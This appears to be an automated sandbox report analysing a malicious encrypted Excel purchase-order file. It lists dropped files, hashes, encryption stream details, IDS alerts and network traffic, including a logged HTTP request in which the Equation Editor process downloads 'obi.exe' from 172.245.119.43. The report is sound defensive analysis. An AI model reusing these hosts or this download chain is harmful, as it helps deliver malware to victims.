Encrypted:false
SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:false
                                                                                                                                                            Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE19B150.emf
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):7608
                                                                                                                                                            Entropy (8bit):5.084930921757286
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:+SSf1FL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5SdvjU+H3tWa6WdTfOYLpR8d
                                                                                                                                                            MD5:C2665932D72E3E1FCC9C4DF0E7CC55A0
                                                                                                                                                            SHA1:38EB914256D13088E85D9B29C92BA259F914D811
                                                                                                                                                            SHA-256:655637B2DC718152CBA41C08847FE24CC00A5E8D97231D453A5B2E692125C787
                                                                                                                                                            SHA-512:C419E80E96307D0A60945B93ACF776085D2B0BC0684B7C34A7D71D776A18D4C5A8379431DC09197ECB8897553175BFB3737286855E9F164B34319A84E659FE55
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....Q.d...................../.../....p....\...../......./.,./....p....../..6Pv...p....`..p0...$y.v.H....1......./....v....$.......d.......d./..^.p.....^.p.G...H..@.f...1.-...../..<.v................<.>v.Z.v....X..R....0..........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NYDA3AU4HKQUVWBPSARJ.temp
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8016
                                                                                                                                                            Entropy (8bit):3.584756671518262
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:chQCAMqbqvsqvJCwo0z8hQCAMqbqvsEHyqvJCworez2gYkH3QhHQlUVaIu:cGao0z8GiHnorez2YQhHmIu
                                                                                                                                                            MD5:C2D28DD526BF8928F96F3C55BF8CDF5E
                                                                                                                                                            SHA1:BCC486EB8A91B3D46C75497DBBB23B561A19B53F
                                                                                                                                                            SHA-256:FAB8166C58988D4EAC75A76BC3A77260D7E0D623C31615533740346125619004
                                                                                                                                                            SHA-512:F7EDD31A821EAC5DCD6CD3BD89C5DFBA9E7D00A02204D0F6BB3DE1438E655F8CE3D6916049E5D51BD9D8551EA3FEC7C24CCEDBB948EDB9DA9E4DAEE295AE6A46
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                                                            C:\Users\user\Desktop\~$PO20210722.xlsx
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):330
                                                                                                                                                            Entropy (8bit):1.4377382811115937
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                            MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            C:\Users\Public\vbc.exe
                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26624
                                                                                                                                                            Entropy (8bit):6.055482508518817
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:ko9xN+bR7ftwwAqCnv/sx3OfEbR7t6ll:nPwbR8t/3MR7AP
                                                                                                                                                            MD5:F5041EC4CE468A07ECBFD076BC0F879B
                                                                                                                                                            SHA1:BDA8CEA1EC8D1CEA253FC661559CD84CEE2195B9
                                                                                                                                                            SHA-256:CAFF14D450514A35EAC5BA34B3E74126360662D7C8FDF60A8008A0E3BB8ED0B3
                                                                                                                                                            SHA-512:4E64A727DA994675AA7517F260D639691F6A94BC9C510DDDE9D54F2F6E7F005B8B799EEEA1D9AAD1DC5128290654FA884A4AA0E397F96444914A067B8BD15C88
                                                                                                                                                            Malicious:true
Antivirus:
• Antivirus: Metadefender, Detection: 20%
• Antivirus: ReversingLabs, Detection: 57%
Joe Sandbox View:
• Filename: PO20210719.docx, Detection: malicious
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..`..........'..........H................@............................................... .............................................................P...p............................................P..(....................................................text...(...........................`.P`.data........0......."..............@.P..rdata..0....@.......$..............@.`@.pdata..p....`.......:..............@.0@.xdata.......p.......>..............@.0@.bss..................................`..idata...............@..............@.0..CRT....h............H..............@.@..tls.................J..............@.@..vmp0................L..............`..h.cobf................\..........................................................................................................................................................................................

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:CDFV2 Encrypted
                                                                                                                                                            Entropy (8bit):7.99479494181637
                                                                                                                                                            TrID:
                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                            File name:PO20210722.xlsx
                                                                                                                                                            File size:1296896
                                                                                                                                                            MD5:67a1fadce73f871b43fcb1f4f587e800
                                                                                                                                                            SHA1:65ba350a884b5c06c17d232c244de610e2305091
                                                                                                                                                            SHA256:4ce9b6af73b53e943f97c68254a1562e4a944403a353146cc8e99a62a8d74314
                                                                                                                                                            SHA512:cf95b8df8e303c95507d9abc6a6418956aa0d784588ea6a17e22f4fc0047358c5b6c6f90683180f211f1f003ab79ff29a3b56e3e6ae2d7169b0b4cc9a51190f8
                                                                                                                                                            SSDEEP:24576:Xg7E7dCIpI9hNIdpXcq621HOBg1KamJrERWkvqU6szeX04Jdy9koY5g:iTmmhEcg179P9cLQ
                                                                                                                                                            File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                            Static OLE Info

                                                                                                                                                            General

                                                                                                                                                            Document Type:OLE
                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                            OLE File "PO20210722.xlsx"

                                                                                                                                                            Indicators

                                                                                                                                                            Has Summary Info:False
                                                                                                                                                            Application Name:unknown
                                                                                                                                                            Encrypted Document:True
                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                            Contains Workbook/Book Stream:False
                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                            Flash Objects Count:
                                                                                                                                                            Contains VBA Macros:False

                                                                                                                                                            Streams

                                                                                                                                                            Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:64
                                                                                                                                                            Entropy:2.73637206947
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                            Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                            Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:112
                                                                                                                                                            Entropy:2.7597816111
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                            Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                            Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                            File Type:data
Stream Size:200
Entropy:3.13335930328
Base64 Encoded:False
Data ASCII (UTF-16LE strings decoded from the raw bytes): {FF9A3F03-56EF-4613-BDD5-5A41C1D07246}, Microsoft.Container.EncryptionTransform
Data Raw (decoded as a TransformInfoHeader): TransformLength 0x58, TransformType 1, TransformID {FF9A3F03-56EF-4613-BDD5-5A41C1D07246} (string length 0x4C), TransformName Microsoft.Container.EncryptionTransform (string length 0x4E)
Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
General
Stream Path:\x6DataSpaces/Version
File Type:data
Stream Size:76
Entropy:2.79079600998
Base64 Encoded:False
Data ASCII (UTF-16LE string decoded from the raw bytes): Microsoft.Container.DataSpaces
Data Raw (decoded as DataSpaceVersionInfo): FeatureIdentifier Microsoft.Container.DataSpaces (string length 0x3C), ReaderVersion 1.0, UpdaterVersion 1.0, WriterVersion 1.0
Stream Path: EncryptedPackage, File Type: data, Stream Size: 1282936
General
Stream Path:EncryptedPackage
File Type:data
Stream Size:1282936
Entropy:7.9988688056
Base64 Encoded:True
Data ASCII: high-entropy ciphertext, no printable content
Data Raw (decoded): the first 8 bytes are the little-endian StreamSize 0x139368 = 1282920, the length of the plaintext package; the remaining 1282928 bytes are the AES-encrypted package (1282920 padded to a 16-byte block boundary)
Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
General
Stream Path:EncryptionInfo
File Type:data
Stream Size:224
Entropy:4.47571952038
Base64 Encoded:False
Data ASCII (UTF-16LE string decoded from the raw bytes): Microsoft Enhanced RSA and AES Cryptographic Provider
Data Raw (decoded as an EncryptionInfo header): EncryptionVersionInfo 4.2 (Standard Encryption), Flags 0x24 (fCryptoAPI | fAES), EncryptionHeaderSize 0x8C, AlgID 0x660E (CALG_AES_128), AlgIDHash 0x8004 (CALG_SHA1), KeySize 128, ProviderType 0x18 (PROV_RSA_AES), CSPName Microsoft Enhanced RSA and AES Cryptographic Provider; the random-looking bytes after the CSP name are the EncryptionVerifier (salt, encrypted verifier and verifier hash)

                                                                                                                                                            Network Behavior

                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                            07/22/21-17:18:28.067536ICMP382ICMP PING Windows192.168.2.22216.58.215.238
                                                                                                                                                            07/22/21-17:18:28.067536ICMP384ICMP PING192.168.2.22216.58.215.238
                                                                                                                                                            07/22/21-17:18:28.110430ICMP408ICMP Echo Reply216.58.215.238192.168.2.22

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jul 22, 2021 17:18:18.885015965 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.022680998 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.022875071 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.023350000 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.164860010 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.164891958 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.164912939 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.164948940 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.171257973 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.308545113 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308584929 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308602095 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308614016 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308625937 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308639050 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308650970 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.308669090 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.311108112 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.311132908 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.311136961 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.311139107 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.448113918 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448153019 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448178053 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448200941 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448225975 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448227882 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.448251009 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448276043 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448287964 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.448292017 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.448295116 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.448303938 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448322058 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.449609041 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.966372967 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:28.719181061 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.761347055 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.761425018 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.777571917 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.819237947 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.819916964 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.819962978 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.819997072 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.820035934 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.835294962 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.876610994 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.876653910 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.876728058 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.136651993 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.178015947 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214484930 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214765072 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214776039 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214792967 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214818001 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214848042 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214852095 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214871883 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214879036 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214905977 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214906931 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214934111 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214935064 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214966059 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214998960 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.215456963 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.215497971 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.215563059 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.215588093 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.216429949 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.216455936 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.216512918 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.217019081 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.217063904 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.217175961 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.217978954 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.218008041 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.218054056 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.218107939 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.218935966 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.218974113 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.219091892 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.219111919 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.219921112 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.219955921 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.220025063 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.220906973 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.220933914 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.221004963 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.221887112 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.221918106 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.221976995 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.222841024 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.222867966 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.222935915 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.223858118 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.223901033 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.224039078 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.224742889 CEST44349166162.159.130.233192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:18:27.937916040 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:18:27.996510029 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:18:27.999674082 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:18:28.057944059 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:18:28.637098074 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:18:28.696980953 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:19:53.526026011 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:19:53.601438999 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 17:18:27.937916040 CEST | 192.168.2.22 | 8.8.8.8 | 0x5faf | Standard query (0) | google.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:18:27.999674082 CEST | 192.168.2.22 | 8.8.8.8 | 0xaf7e | Standard query (0) | google.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:18:28.637098074 CEST | 192.168.2.22 | 8.8.8.8 | 0x8559 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:19:53.526026011 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.jewelryengravings.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 17:18:27.996510029 CEST | 8.8.8.8 | 192.168.2.22 | 0x5faf | No error (0) | google.com | | 216.58.215.238 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:18:28.057944059 CEST | 8.8.8.8 | 192.168.2.22 | 0xaf7e | No error (0) | google.com | | 216.58.215.238 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:18:28.696980953 CEST | 8.8.8.8 | 192.168.2.22 | 0x8559 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:18:28.696980953 CEST | 8.8.8.8 | 192.168.2.22 | 0x8559 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:18:28.696980953 CEST | 8.8.8.8 | 192.168.2.22 | 0x8559 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:18:28.696980953 CEST | 8.8.8.8 | 192.168.2.22 | 0x8559 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:18:28.696980953 CEST | 8.8.8.8 | 192.168.2.22 | 0x8559 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:19:53.601438999 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | Name error (3) | www.jewelryengravings.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• 172.245.119.43

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 172.245.119.43 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:18:19.023350000 CEST | 0 | OUT | GET /d/obi.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 172.245.119.43
Connection: Keep-Alive
Jul 22, 2021 17:18:19.164860010 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 15:18:19 GMT
